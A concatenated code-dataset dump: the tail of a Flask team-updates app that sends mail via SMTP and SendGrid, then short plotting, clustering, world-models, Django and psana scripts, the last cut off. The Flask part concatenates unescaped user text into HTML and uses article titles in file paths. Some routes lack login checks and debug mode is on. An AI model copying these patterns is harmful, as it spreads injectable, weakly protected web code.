', methods=['GET', 'POST'])\n@is_logged_in\ndef delete_update(id):\n # Execute\n update_delete = BlogPost.query.get_or_404(id)\n db.session.delete(update_delete)\n # Commit DB\n db.session.commit()\n flash(\"Updates deleted!\", 'success')\n return redirect(url_for('dashboard'))\n\n\n@app.route('/contactus')\ndef contactus():\n return render_template('contact_us.html')\n\n\n@app.route('/send_mail', methods=['POST'])\n@is_logged_in\ndef send_mail():\n me = \"nam-qa-update@microfocus.com\"\n you = \"mohamediburahimsha.s@microfocus.com\"\n #\n team_updates = BlogPost.query.all()\n app.logger.info(team_updates)\n message = MIMEMultipart('alternative')\n message['Subject'] = \"Weekly Staff Updates\"\n message['From'] = me\n message['To'] = you\n html = \"\"\"\\\n \n \n \n \n Updates Mail\n \n \n Weekly Team Updates
</h2>\n <hr>\n \"\"\"\n for d in team_updates:\n name = d.name\n body = d.body\n html = html + \"<b>\"\n html = html + name + \"</b><br>\"\n html = html + \"<i>\"\n html = html + body + \"</i><br>\"\n html = html + \"<hr>
\"\n\n html = html + \"\"\"\n \n \"\"\"\n # Record the MIME types of both parts - text/plain and text/html.\n # part1 = MIMEText(text, 'plain')\n part2 = MIMEText(html, 'html')\n\n # Attach parts into message container.\n # According to RFC 2046, the last part of a multipart message, in this case\n # the HTML message, is best and preferred.\n # msg.attach(part1)\n message.attach(part2)\n\n # Send the message via local SMTP server.\n s = smtplib.SMTP('smtp.microfocus.com:25')\n # sendmail function takes 3 arguments: sender's address, recipient's address\n # and message to send - here it is sent as one string.\n s.sendmail(me, you, message.as_string())\n s.quit()\n flash(\"Message sent successfully!\", 'success')\n return redirect(url_for('dashboard'))\n\n\n@app.route('/send_mail_dashboard', methods=['POST'])\n@is_logged_in\ndef send_mail_dashboard():\n username = 'apikey'\n sender_email = \"flask-app-noreply@nam-qa-mf.com\"\n receiver_email = session['email']\n # password = os.environ.get('SENDGRID_API_KEY')\n password = global_app_key\n #\n team_updates = None\n user01 = None\n if session['username'] == 'admin':\n team_updates = BlogPost.query.all()\n else:\n user01 = BlogPost.query.filter_by(author=session['username']).first()\n app.logger.info(team_updates)\n app.logger.info(user01)\n message = MIMEMultipart(\"alternative\")\n message[\"Subject\"] = \"Weekly Team Updates\"\n message[\"From\"] = sender_email\n message[\"To\"] = receiver_email\n html = \"\"\"\\\n \n \n \n \n Updates Mail\n \n \n Weekly Team Updates
</h2>\n <hr>\n \"\"\"\n if session['username'] == 'admin':\n if team_updates is not None:\n for d in team_updates:\n name = d.name\n body = d.body\n html = html + \"<b>\"\n html = html + name + \"</b><br>\"\n html = html + \"<i>\"\n html = html + body + \"</i><br>\"\n html = html + \"<hr>\"\n else:\n flash(\"Sorry ! No updates available for the user!\", 'danger')\n return redirect(url_for('dashboard'))\n else:\n if user01 is not None:\n name = user01.name\n body = user01.body\n html = html + \"<b>\"\n html = html + name + \"</b><br>\"\n html = html + \"<i>\"\n html = html + body + \"</i><br>\"\n html = html + \"<hr>
\"\n else:\n flash(\"Sorry ! No updates available for the user!\", 'danger')\n return redirect(url_for('dashboard'))\n\n html = html + \"\"\"\n \n \"\"\"\n # Record the MIME types of both parts - text/plain and text/html.\n # part1 = MIMEText(text, 'plain')\n part2 = MIMEText(html, 'html')\n\n # Attach parts into message container.\n # According to RFC 2046, the last part of a multipart message, in this case\n # the HTML message, is best and preferred.\n # msg.attach(part1)\n message.attach(part2)\n\n context = ssl.create_default_context()\n with smtplib.SMTP_SSL(\"smtp.sendgrid.net\", 465, context=context) as server:\n server.login(username, password)\n server.sendmail(\n sender_email, receiver_email, message.as_string()\n )\n flash(\"Mail sent successfully!\", 'success')\n return redirect(url_for('dashboard'))\n\n\n# @app.route('/send_article', methods=['GET', 'POST'])\n# @is_logged_in\n# def send_article():\n# me = \"nam-qa-update@microfocus.com\"\n# you = \"mohamediburahimsha.s@microfocus.com\"\n# #\n# d = Articles.query.get_or_404(1)\n# app.logger.info(d)\n# message = MIMEMultipart('alternative')\n# message['Subject'] = \"Weekly Staff Updates\"\n# message['From'] = me\n# message['To'] = you\n# html = \"\"\"\\\n# \n# \n# \n# \n# Articles\n# \n# \n# \"\"\"\n# # for d in article_data:\n# title = d.title\n# author = d.author\n# date = d.date_posted.strftime(\"%m/%d/%Y %H:%M:%S\")\n# body = d.body\n# body = re.sub(r'(
\"\n# html = html + title + \" Written by \" + author + \" on \" + date + \"\"\n# html = html + \"
\"\n# html = html + \"\"\n# html = html + body + \"
\"\n# html = html + \"
\"\n# html = html + \"\"\"\n# \n# \"\"\"\n# html_file = open(\"upload/\" + title + \".html\", \"w\")\n# html_file.write(html)\n# html_file.close()\n# # Record the MIME types of both parts - text/plain and text/html.\n# # part1 = MIMEText(text, 'plain')\n# config = pdfkit.configuration(wkhtmltopdf=\"C:\\\\Program Files\\\\wkhtmltopdf\\\\bin\\\\wkhtmltopdf.exe\")\n# part2 = MIMEText(html, 'html')\n# pdfkit.from_file('upload/' + title + '.html', 'upload/' + title + '.pdf', configuration=config)\n# # pdf = pdfkit.from_file('article.html', False)\n# filename = 'upload/' + title + '.pdf'\n# fo = open(filename, 'rb')\n# attach = email.mime.application.MIMEApplication(fo.read(), _subtype=\"pdf\")\n# fo.close()\n# attach.add_header('Content-Disposition', 'attachment', filename=filename)\n#\n# app.logger.info(html)\n#\n# mail_body = \"\"\"\\\n# \n# \n# \n# \n# Articles\n# \n# \n# Hello Reader
<br>\n# Thanks for downloading this article, your article has been attached in the mail<br>\n# Please share your valuable feedback to us !<br>\n# Happy Learning!<br>\n# Thanks | Flask app Developers<br>
\n# \"\"\"\n# part_subject = MIMEText(mail_body, 'html')\n# # Attach parts into message container.\n# # According to RFC 2046, the last part of a multipart message, in this case\n# # the HTML message, is best and preferred.\n# # msg.attach(part1)\n# message.attach(attach)\n# message.attach(part_subject)\n#\n# # Send the message via local SMTP server.\n# s = smtplib.SMTP('smtp.microfocus.com:25')\n# # sendmail function takes 3 arguments: sender's address, recipient's address\n# # and message to send - here it is sent as one string.\n# s.sendmail(me, you, message.as_string())\n# s.quit()\n# flash(\"Message sent successfully!\", 'success')\n# return redirect(url_for('articles'))\n\n\n@app.route('/send_article', methods=['GET', 'POST'])\n@is_logged_in\ndef send_article():\n # me = \"nam-qa-update@microfocus.com\"\n # you = \"mohamediburahimsha.s@microfocus.com\"\n # #\n d = Articles.query.get_or_404(1)\n app.logger.info(d)\n # message = MIMEMultipart('alternative')\n # message['Subject'] = \"Weekly Staff Updates\"\n # message['From'] = me\n # message['To'] = you\n html = \"\"\"\\\n \n \n \n \n Articles\n \n \n \"\"\"\n # for d in article_data:\n title = d.title\n author = d.author\n date = d.date_posted.strftime(\"%m/%d/%Y %H:%M:%S\")\n body = d.body\n # body = re.sub(r'(
\"\n html = html + title + \" Written by \" + author + \" on \" + date + \"\"\n html = html + \"
\"\n html = html + \"\"\n html = html + body + \"
\"\n html = html + \"
\"\n html = html + \"\"\"\n \n \"\"\"\n html_file = open(basedir + \"/upload/\" + title + \".html\", \"w\")\n html_file.write(html)\n html_file.close()\n # Record the MIME types of both parts - text/plain and text/html.\n # part1 = MIMEText(text, 'plain')\n # config = pdfkit.configuration(wkhtmltopdf=\"C:\\\\Program Files\\\\wkhtmltopdf\\\\bin\\\\wkhtmltopdf.exe\")\n # config = pdfkit.configuration(wkhtmltopdf=\"/usr/local/bin/wkhtmltopdf\")\n part2 = MIMEText(html, 'html')\n # pdfkit.from_file(basedir+'/upload/' + title + '.html', basedir+'/upload/' + title + '.pdf', configuration=config)\n # app.logger.info(basedir + '/upload/' + title + '.pdf')\n # pdfkit.from_file(basedir + '/upload/' + title + '.html', basedir + '/upload/' + title + '.pdf')\n # pdf = pdfkit.from_file('article.html', False)\n\n # filename = basedir+'/upload/' + title + '.pdf'\n # with open(filename, 'rb') as f:\n # data = f.read()\n # f.close()\n # encoded = base64.b64encode(data).decode()\n # attachment = Attachment()\n # attachment.file_content = FileContent(encoded)\n # attachment.file_type = FileType('application/pdf')\n # attachment.file_name = FileName(title + '.pdf')\n # attachment.disposition = Disposition('attachment')\n # attachment.content_id = ContentId('Example Content ID')\n # message.attachment = attachment\n # app.logger.info(html)\n mail_body = \"\"\"\\\n \n \n \n \n Articles\n \n \n Hello \"\"\" + session['name'] + \"\"\",
<br>\n Thanks for downloading this article, your article has been attached in the mail<br>\n Please share your valuable feedback to us !<br>\n Happy Learning!<br>\n Thanks | Flask app Developers<br>
\n \"\"\"\n message = Mail(\n from_email='flaskapp@nam-qa-mf.com',\n to_emails=To(session['email']),\n subject='Article from flaskapp - ' + title + '.pdf',\n html_content='and easy to do anywhere, even with Python')\n try:\n sg = sendgrid.SendGridAPIClient(os.environ.get('SENDGRID_API_KEY'))\n response = sg.send(message)\n print(response.status_code)\n print(response.body)\n print(response.headers)\n except Exception as e:\n print(str(e))\n flash(\"Message sent successfully!\", 'success')\n return redirect(url_for('articles'))\n\n\ndef html_creation(art_id):\n d = Articles.query.get_or_404(art_id)\n title = d.title\n author = d.author\n date = d.date_posted.strftime(\"%m/%d/%Y %H:%M:%S\")\n body = d.body\n app.logger.info(body)\n html = \"\"\"\\\n \n \n \n \n Articles\n \n \n \"\"\"\n # body = re.sub(r'(
\"\n html = html + title + \" Written by \" + author + \" on \" + date + \"\"\n html = html + \"
\"\n html = html + \"\"\n html = html + body + \"
\"\n html = html + \"
\"\n html = html + \"\"\"\n \n \"\"\"\n\n html_file = open(basedir + \"/templates/htmltopdf/\" + title.replace(\" \", \"\") + \".html\", \"w\")\n html_file.write(html)\n html_file.close()\n\n\n@app.route('/send_article_new/', methods=['GET', 'POST'])\n@is_logged_in\ndef send_article_new(id):\n username = 'apikey'\n sender_email = \"flask-app-noreply@nam-qa-mf.com\"\n receiver_email = session['email']\n password = global_app_key\n\n d = Articles.query.get_or_404(id)\n title = d.title\n author = d.author\n date = d.date_posted.strftime(\"%m/%d/%Y %H:%M:%S\")\n body = d.body\n app.logger.info(d)\n\n message = MIMEMultipart(\"alternative\")\n message[\"Subject\"] = title\n message[\"From\"] = sender_email\n message[\"To\"] = receiver_email\n html = \"\"\"\\\n \n \n \n \n Articles\n \n \n \"\"\"\n # body = re.sub(r'(
\"\n html = html + title + \" Written by \" + author + \" on \" + date + \"\"\n html = html + \"
\"\n html = html + \"\"\n html = html + body + \"
\"\n html = html + \"
\"\n html = html + \"\"\"\n \n \"\"\"\n mail_body = \"\"\"\\\n \n \n \n \n Articles\n \n \n Hello \"\"\" + session['name'] + \"\"\",
<br>\n Thanks for downloading this article, your article has been attached in the mail<br>\n Please share your valuable feedback to us !<br>\n Happy Learning!<br>\n Thanks | Flask app Developers<br>
\n \"\"\"\n\n # html_file = open(basedir + \"/upload/\" + title + \".html\", \"w\")\n # html_file.write(html)\n # html_file.close()\n # part1 = MIMEText(mail_body, \"html\")\n part2 = MIMEText(html, \"html\")\n\n # Add HTML/plain-text parts to MIMEMultipart message\n # The email client will try to render the last part first\n message.attach(part2)\n # message.attach(part2)\n # HTML(basedir+'/upload/' + title + '.html').write_pdf(basedir+'/upload/' + title + '.pdf')\n # pdf = HTML(basedir+'/upload/' + title + '.html').write_pdf()\n # open(basedir + \"/upload/\" + title + \".pdf\", 'wb').write(pdf)\n # config = pdfkit.configuration(wkhtmltopdf='/usr/local/bin/wkhtmltopdf')\n # pdfkit.from_file(basedir+'/upload/' + title + '.html', basedir+'/upload/' + title + '.pdf', configuration=config)\n\n # filename = basedir+'/upload/' + title + '.pdf'\n # attachment = open(filename, \"rb\")\n #\n # part = MIMEBase('application', 'octet-stream')\n # part.set_payload(attachment.read())\n # encoders.encode_base64(part)\n # part.add_header('Content-Disposition', \"attachment; filename= %s\" % filename)\n #\n # message.attach(part)\n\n # Create secure connection with server and send email\n context = ssl.create_default_context()\n with smtplib.SMTP_SSL(\"smtp.sendgrid.net\", 465, context=context) as server:\n server.login(username, password)\n server.sendmail(\n sender_email, receiver_email, message.as_string()\n )\n flash(\"Mail sent successfully!\", 'success')\n return redirect(url_for('article', id=id))\n\n\n@app.before_request\ndef make_session_permanent():\n session.permanent = True\n app.permanent_session_lifetime = timedelta(minutes=15)\n\n\n@app.errorhandler(404)\ndef not_found_error(error):\n return render_template('404.html'), 404\n\n\n@app.errorhandler(500)\ndef internal_error(error):\n return render_template('500.html'), 500\n\n\n# User Details page\n@app.route('/user_details')\n@is_logged_in_admin_user\ndef user_details():\n # Get articles\n result = db.session.query(Users).count()\n users = Users.query.all()\n oauth_users = OAuth.query.all()\n\n if result > 0:\n return render_template('user_details.html', users=users, oauth_users=oauth_users)\n else:\n msg = \"No users Found\"\n return render_template('user_details.html', msg=msg)\n\n\n@app.route('/delete_user/', methods=['GET', 'POST'])\n@is_logged_in_admin_user\ndef delete_user(id):\n # Execute\n user_delete = Users.query.get_or_404(id)\n try:\n db.session.delete(user_delete)\n # Commit DB\n db.session.commit()\n flash(\"User deleted successfully!\", 'success')\n return redirect(url_for('user_details'))\n except sqlalchemy.exc.IntegrityError as e:\n flash(\"Check the foreign-key user details table, \"\n \"if user exists, please delete the user from foreign-key table and then try! 
\", 'danger')\n return redirect(url_for('user_details'))\n\n\n@app.route('/delete_ouser/', methods=['GET', 'POST'])\n@is_logged_in_admin_user\ndef delete_ouser(id):\n # Execute\n ouser_delete = OAuth.query.get_or_404(id)\n db.session.delete(ouser_delete)\n # Commit DB\n db.session.commit()\n flash(\"Oauth Foreign User deleted successfully!, Now you can delete from main users table\", 'success')\n return redirect(url_for('user_details'))\n\n\n@app.route('/url_links')\ndef url_links():\n # Get articles\n result = db.session.query(Urls).count()\n urls = Urls.query.all()\n\n if result > 0:\n return render_template('imp_links.html', urls=urls)\n else:\n msg = \"No links Found\"\n return render_template('imp_links.html', msg=msg)\n\n\n# URL Form Class\nclass URLUpdateForm(Form):\n url_name = StringField('URL Name', [validators.length(min=1, max=200)])\n url = StringField('URL', [validators.length(min=5)])\n\n\n@app.route('/add_url', methods=['GET', 'POST'])\ndef add_url():\n form = URLUpdateForm(request.form)\n if request.method == 'POST' and form.validate():\n url_name = form.url_name.data\n url = form.url.data\n # Execute\n urls = Urls(url_name=url_name, url=url)\n db.session.add(urls)\n # Commit DB\n db.session.commit()\n flash(\"Url added!\", 'success')\n return redirect(url_for('url_links'))\n return render_template('add_url.html', form=form)\n\n\n@app.route('/edit_url/', methods=['GET', 'POST'])\n@is_logged_in\ndef edit_url(id):\n # Get article by id\n url_edit = Urls.query.get_or_404(id)\n # Get form\n form = URLUpdateForm(request.form)\n # Populate the article form fields\n form.url_name.data = url_edit.url_name\n form.url.data = url_edit.url\n if request.method == 'POST' and form.validate():\n url_edit.url_name = request.form['url_name']\n url_edit.url = request.form['url']\n # Commit DB\n db.session.commit()\n flash(\"Updated successfully!\", 'success')\n return redirect(url_for('url_links'))\n return render_template('edit_url.html', form=form)\n\n\n@app.route('/delete_url/', methods=['GET', 'POST'])\n@is_logged_in\n@is_logged_in_admin_url\ndef delete_url(id):\n url_delete = Urls.query.get_or_404(id)\n db.session.delete(url_delete)\n # Commit DB\n db.session.commit()\n flash(\"Url deleted successfully!\", 'success')\n return redirect(url_for('url_links'))\n\n\n@app.route('/add_task', methods=['GET', 'POST'])\ndef add_task():\n if request.method == 'POST':\n task = request.form['task']\n name = request.form['name']\n status = request.form['status']\n # Execute\n tasks = Tasks(task=task, name=name, status=status)\n db.session.add(tasks)\n # Commit DB\n db.session.commit()\n flash(\"User task added!\", 'success')\n return redirect('/add_task')\n else:\n all_tasks = Tasks.query.all()\n all_users = Users.query.all()\n return render_template('dynamic_table.html', tasks=all_tasks, users=all_users)\n\n\n@app.route('/edit_task/', methods=['GET', 'POST'])\n@is_logged_in\ndef edit_task(task_id):\n task_edit = Tasks.query.get_or_404(task_id)\n all_users = Users.query.all()\n if request.method == 'POST':\n task_edit.task = request.form['task']\n task_edit.name = request.form['name']\n task_edit.status = request.form['status']\n task_edit.comments = request.form['comments']\n db.session.commit()\n flash(\"User task edited!\", 'success')\n return redirect('/add_user_task')\n else:\n return render_template('edit_task.html', tasks=task_edit, users=all_users)\n\n\n@app.route('/delete_task/', methods=['GET', 'POST'])\n@is_logged_in\ndef delete_task(task_id):\n task_delete = 
Tasks.query.get_or_404(task_id)\n db.session.delete(task_delete)\n # Commit DB\n db.session.commit()\n flash(\"Task deleted successfully!\", 'success')\n return redirect('/add_user_task')\n\n\n@app.route('/add_user_task', methods=['GET', 'POST'])\n@is_logged_in\ndef add_user_task():\n # cur = mysql.connection.cursor()\n # cur.execute(\"SELECT name, COUNT( name ) x FROM tasks GROUP BY name HAVING x >0\")\n # results = cur.fetchall()\n results = db.engine.execute(\"SELECT name, COUNT( name ) x FROM tasks GROUP BY name HAVING x >0\")\n if request.method == 'POST':\n task = request.form['task']\n name = request.form['name']\n status = request.form['status']\n # Execute\n tasks = Tasks(task=task, name=name, status=status)\n db.session.add(tasks)\n # Commit DB\n db.session.commit()\n flash(\"User task added!\", 'success')\n return redirect('/add_user_task')\n else:\n all_tasks = Tasks.query.all()\n all_users = Users.query.all()\n return render_template('user_task_list.html', tasks=all_tasks, users=all_users, total_tasks=results)\n\n\n# Profile_Page\n@app.route('/profile', methods=['GET', 'POST'])\n@is_logged_in\ndef profile():\n check = Users.query.filter_by(email=session['email']).first()\n if request.method == 'POST':\n check.name = request.form['name']\n check.username = request.form['username']\n check.email = request.form['email']\n db.session.commit()\n session['name'] = check.name\n session['username'] = check.username\n flash(\"Profile Updated!\", 'success')\n check = Users.query.filter_by(username=session['username']).first()\n return render_template('profile.html', check=check)\n return render_template('profile.html', check=check)\n\n\n# Change_Password\n@app.route('/old_pwd_change', methods=['GET', 'POST'])\n@is_logged_in\ndef old_pwd_change():\n check = Users.query.filter_by(username=session['username']).first()\n if request.method == 'POST':\n oldpwd = request.form['oldpwd']\n newpwd = request.form['newpwd']\n confpwd = request.form['confpwd']\n if sha256_crypt.verify(oldpwd, check.password):\n if newpwd == confpwd:\n check.password = sha256_crypt.hash(newpwd)\n db.session.commit()\n flash('Your password has been changed successfully!', 'success')\n return redirect(url_for('old_pwd_change'))\n else:\n flash('Password mismatched!', 'danger')\n return render_template('change_pwd1.html')\n else:\n flash('Incorrect old password !', 'danger')\n return render_template('change_pwd1.html')\n else:\n return render_template('change_pwd1.html')\n\n\n#\n# class AddCommentForm(Form):\n# comment = StringField(\"Comment\", [validators.DataRequired()])\n# submit = SubmitField(\"Post\")\n\n\n@app.route(\"/article//comment\", methods=[\"GET\", \"POST\"])\n@is_logged_in\ndef comment_post(article_id):\n # cmt_article = Articles.query.get_or_404(article_id)\n # form = AddCommentForm()\n if request.method == 'POST': # this only gets executed when the form is submitted and not when the page loads\n comment = request.form['comment']\n article_comment = Comments(comment=comment, article_id=article_id, user=session['username'])\n db.session.add(article_comment)\n db.session.commit()\n flash(\"Your comment has been added to the post\", \"success\")\n return redirect('/article/' + str(article_id))\n # return render_template(\"article\", article_id=article_id)\n # return render_template(\"article.html\", article_id=article_id)\n\n\n@app.route('/delete_comment//', methods=['GET', 'POST'])\n@is_logged_in\ndef delete_comment(comment_id, article_id):\n # Execute\n comment_delete = 
Comments.query.get_or_404(comment_id)\n db.session.delete(comment_delete)\n # Commit DB\n db.session.commit()\n flash(\"Comment deleted!\", 'success')\n return redirect('/article/' + str(article_id))\n\n\n@app.teardown_request\ndef session_clear(exception=None):\n db.session.remove()\n if exception and db.session.is_active:\n db.session.rollback()\n\n\nif __name__ == '__main__':\n app.run(debug=True, ssl_context='adhoc')\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":63661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"348985515","text":"from math import *\nimport numpy as np\nimport pandas as pd\nfrom scipy.optimize import curve_fit\nimport matplotlib.pyplot as plt \nfrom scipy.integrate import quad,dblquad\nfrom scipy import integrate \nimport csv\nfrom scipy.optimize import minimize\nfrom scipy.optimize import differential_evolution \nimport N_models \n\n\n\ndef fxn(Vg,E,l): \n T0=298\n T1=300 \n return N_models. E_act_fixedtemp_gatevoltage(Vg,E,l,T0,T1) \nvecComp = np.vectorize(fxn) \n\nE=0.7\nl=0.15 \n\t \nVg=np.linspace(-1.2,0.2,500) \n \nI=vecComp(Vg,E,l) \nplt.plot(Vg,I,color='blue',label='OPE3C')\n\n\n\n\n\ndef fxn(Vg,E,l): \n T0=190\n T1=300\n return N_models. E_act_fixedtemp_gatevoltage(Vg,E,l,T0,T1) \nvecComp = np.vectorize(fxn) \n\nE=0.7\nl=0.15 \t\n\t \nVg=np.linspace(-1.2,0.2,500) \n \nI=vecComp(Vg,E,l) \nplt.plot(Vg,I,color='green',label='OPE2C')\n\ndef fxn(Vg,E,l): \n T0=55\n T1=400\n return N_models. E_act_fixedtemp_gatevoltage(Vg,E,l,T0,T1) \nvecComp = np.vectorize(fxn) \n\nE=0.7 \nl=0.15\t \nVg=np.linspace(-1.2,0.2, 500) \n \nI=vecComp(Vg,E,l) \nplt.plot(Vg,I,color='red',label='OPE1C') \nplt.xlabel('Vg(V)') \nplt.ylabel('Ea(meV)') \nplt.title('Ea_vs_Vg for OPEnC_Neg') \nplt.legend() \nplt.show() \n\n","sub_path":"Ferrocene_project_codes/Ea_vs _ gate_code/Main_code.py","file_name":"Main_code.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"321799016","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.cluster import KMeans\n\ndf = pd.read_csv(\"dota2Train.csv\", header=None)\ndata = np.asanyarray(df)\n\nkmeans = KMeans(n_clusters=2)\nmodel = kmeans.fit(data)\nclusters = model.labels_\n\nwin_counter = [0, 0]\nlose_counter = [0, 0]\n\nfor i in range(len(data)):\n if data[i][0] == 1:\n win_counter[clusters[i]] += 1\n elif data[i][0] == -1:\n lose_counter[clusters[i]] += 1\n\nprint(\"Cluster 1: \" + str(100 * win_counter[0]/sum(win_counter)) + \"% of total wins.\")\nprint(\"Cluster 1: \" + str(100 * lose_counter[0]/sum(lose_counter)) + \"% of total losses.\")\nprint(\"Cluster 2: \" + str(100 * win_counter[1]/sum(win_counter)) + \"% of total wins.\")\nprint(\"Cluster 2: \" + str(100 * lose_counter[1]/sum(lose_counter)) + \"% of total losses.\")","sub_path":"Machine Learning/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"242583571","text":"import numpy as np\nfrom vae import ConvVAE\nfrom lstm import MDNRNN\nimport torch\n\nIN_FILTERS = 3\nZ_DIM = 32\nA_DIM = 3\nRNN_H_DIM = 256\nNUM_MIXTURES = 5\nRNN_IN_DIM = Z_DIM + A_DIM\nRNN_OUT_DIM = Z_DIM\nDTYPE = torch.float16\n\nclass Controller:\n def __init__(self, load_model=True, use_gpu=False, cauchy_init=False):\n if use_gpu and torch.cuda.is_available():\n device = torch.device('cuda')\n else:\n device = torch.device('cpu')\n self.device = device\n\n self.vae = ConvVAE(IN_FILTERS, Z_DIM, cauchy_init=cauchy_init)\n self.lstm = MDNRNN(RNN_H_DIM, RNN_IN_DIM, RNN_OUT_DIM, NUM_MIXTURES, cauchy_init=cauchy_init)\n self.rnn_state = self.lstm.init_hidden(batch_size=1, device=device)\n\n if load_model:\n self.vae.load_state_dict(torch.load('models/vae.pt'))\n self.lstm.load_state_dict(torch.load('models/lstm.pt'))\n \n self.vae.eval()\n self.lstm.eval()\n self.vae.to(device=self.device)\n self.lstm.to(device=self.device)\n\n if cauchy_init:\n self.w = np.random.standard_cauchy((Z_DIM + RNN_H_DIM, A_DIM))\n self.b = np.random.standard_cauchy(A_DIM)\n else:\n self.w = np.random.randn(Z_DIM + RNN_H_DIM, A_DIM)\n self.b = np.random.randn(A_DIM)\n\n def get_z(self, obs):\n obs = obs.reshape(-1, 64, 64, 3)\n obs = obs.transpose(0, 3, 2, 1)\n image = obs / 255\n image = torch.tensor(image, dtype=DTYPE, device=self.device)\n mu, std = self.vae.get_mu_std(image)\n z = mu + std * torch.randn_like(mu)\n return z\n\n def reset_h(self):\n self.rnn_state = self.lstm.init_hidden(batch_size=1, device=self.device)\n\n def get_action(self, obs):\n z = self.get_z(obs)\n h, _ = self.rnn_state\n \n state = torch.cat((z, h[0]), dim=1)\n state = state.cpu().detach().numpy()\n action = np.tanh(np.dot(state, self.w) + self.b)\n action = action.reshape(-1)\n action[1] = (action[1] + 1) / 2\n action[2] = np.clip(action[2], 0, 1)\n\n action_tensor = torch.tensor(action, dtype=DTYPE, device=self.device)\n self.rnn_state = self.lstm.calc_next_state(z, action_tensor, self.rnn_state)\n \n return action\n ","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"510875785","text":"# coding=utf-8\n\"\"\"Update location context document.\"\"\"\n\nfrom django.core.management.base import BaseCommand\nfrom django.contrib.gis.db import models\nfrom bims.models.location_site import (\n LocationSite,\n location_site_post_save_handler,\n)\n\n\nclass Command(BaseCommand):\n \"\"\"Update location site context document\n \"\"\"\n\n def add_arguments(self, parser):\n parser.add_argument(\n '-i',\n '--ignore-not-empty',\n dest='ignore_not_empty',\n default=False,\n help='Only update empty location context')\n\n def handle(self, *args, **options):\n ignore_not_empty = options.get('ignore_not_empty')\n if ignore_not_empty:\n location_sites = LocationSite.objects.filter(\n location_context_document__isnull=True,\n )\n else:\n location_sites = LocationSite.objects.filter(id=9344)\n num = len(location_sites)\n i = 1\n\n models.signals.post_save.disconnect(\n location_site_post_save_handler,\n )\n for location_site in location_sites:\n print('Updating %s of %s, %s' % (i, num, location_site.name))\n i += 1\n success, message = location_site.update_location_context_document()\n if not success:\n print('[FAILED] %s : %s' % (location_site.name, message))\n if success:\n location_site.save()\n\n models.signals.post_save.connect(\n location_site_post_save_handler,\n )\n","sub_path":"bims/management/commands/update_location_context_documents.py","file_name":"update_location_context_documents.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"110829370","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\nfrom __future__ import division\nimport sys\nimport math\nimport numpy as np\nfrom time import time\nimport psana\n\nfrom Detector.AreaDetector import AreaDetector\nfrom ImgAlgos.PyAlgos import PyAlgos, print_arr, print_arr_attr\nfrom pyimgalgos.PeakStore import PeakStore\nfrom pyimgalgos.GlobalUtils import subtract_bkgd\n\n##-----------------------------\n# Initialization of graphics\nfrom pyimgalgos.GlobalGraphics import store as sp\nimport pyimgalgos.GlobalGraphics as gg\n##-----------------------------\n\nntest = int(sys.argv[1]) if len(sys.argv)>1 else 1\nprint('Test # %d' % ntest)\n\n##-----------------------------\nSKIP = 0\nEVTMAX = 10 + SKIP\n#SKIP = 70024\n#EVTMAX = 1000000 + SKIP\nEVTPLOT = 1 \nDO_PLOT = True\n##-----------------------------\n\ndef do_print(i) :\n return True\n #return False\n #if i==1 : return True\n #return not i%10\n\n##-----------------------------\n \ndsname = 'exp=cxif5315:run=169'\nsrc = psana.Source('DetInfo(CxiDs2.0:Cspad.0)')\nprint('%s\\nExample for\\n dataset: %s\\n source : %s' % (85*'_',dsname, src))\n\n# Non-standard calib directory\n#psana.setOption('psana.calib-dir', './empty/calib')\npsana.setOption('psana.calib-dir', '/reg/d/psdm/CXI/cxif5315/calib')\n\nds = psana.DataSource(dsname)\nevt = next(ds.events())\nenv = ds.env()\n\nrunnum = evt.run()\n\n#run = ds.runs().next()\n#runnum = run.run()\n\n#for key in evt.keys() : print key\n\n##-----------------------------\n\ndet = AreaDetector(src, env, pbits=0)\nprint(85*'_', '\\nInstrument: %s run number: %d' % (det.instrument(), runnum))\n\nnda_peds = det.pedestals(evt)\nnda_bkgd = det.bkgd(evt)\nnda_smask = det.mask(evt, calib=False, status=True, edges=True, central=True, unbond=True, unbondnbrs=True)\n\n#print_arr_attr(nda_peds, 'nda_peds')\n#print_arr_attr(nda_bkgd, 'nda_bkgd')\n#print_arr_attr(nda_smask, 'nda_smask')\n##-----------------------------\n\nshape_cspad = (32,185,388)\n\nmask_arc = np.loadtxt('../rel-mengning/work/roi_mask_nda_arc.txt')\nmask_equ = np.loadtxt('../rel-mengning/work/roi_mask_nda_equ.txt')\nmask_img = np.loadtxt('../rel-mengning/work/roi_mask_nda_equ_arc.txt')\nmask_arc.shape = mask_equ.shape = mask_img.shape = shape_cspad\nprint_arr_attr(mask_arc, 'mask_arc')\n\n\nseg1 = np.ones((185,388))\nregs_check = np.zeros(shape_cspad)\nfor s in (4,12,20,28) : regs_check[s,10:100,270:370] = 20*seg1[10:100,270:370]\n\nwinds_bkgd = [ (s, 10, 100, 270, 370) for s in (4,12,20,28)] # use part of segments 4 and 20 to subtr bkgd\n\nwinds_arc = [ (s, 0, 185, 0, 388) for s in (0,1,7,8,9,15,16,17,23,24,25,31)]\nwinds_equ = [ (s, 0, 185, 0, 388) for s in (0,1,3,8,9,11,16,17,19,24,25,27)]\n#winds_all = [ (s, 0, 185, 0, 388) for s in (0,1,3,7,8,9,11,15,16,17,19,23,24,25,27,31)]\n\nprint_arr(winds_arc, 'winds_arc')\nprint_arr_attr(winds_arc, 'winds_arc')\n\nalg_arc = PyAlgos(windows=winds_arc, mask=mask_arc, pbits=2)\nalg_arc.set_peak_selection_pars(npix_min=0, npix_max=1e6, amax_thr=0, atot_thr=0, son_min=10)\n#alg_arc.set_peak_selection_pars(npix_min=0, npix_max=1e6, amax_thr=0, atot_thr=500, son_min=6) # for v2r1\n\nalg_equ = PyAlgos(windows=winds_equ, mask=mask_equ, 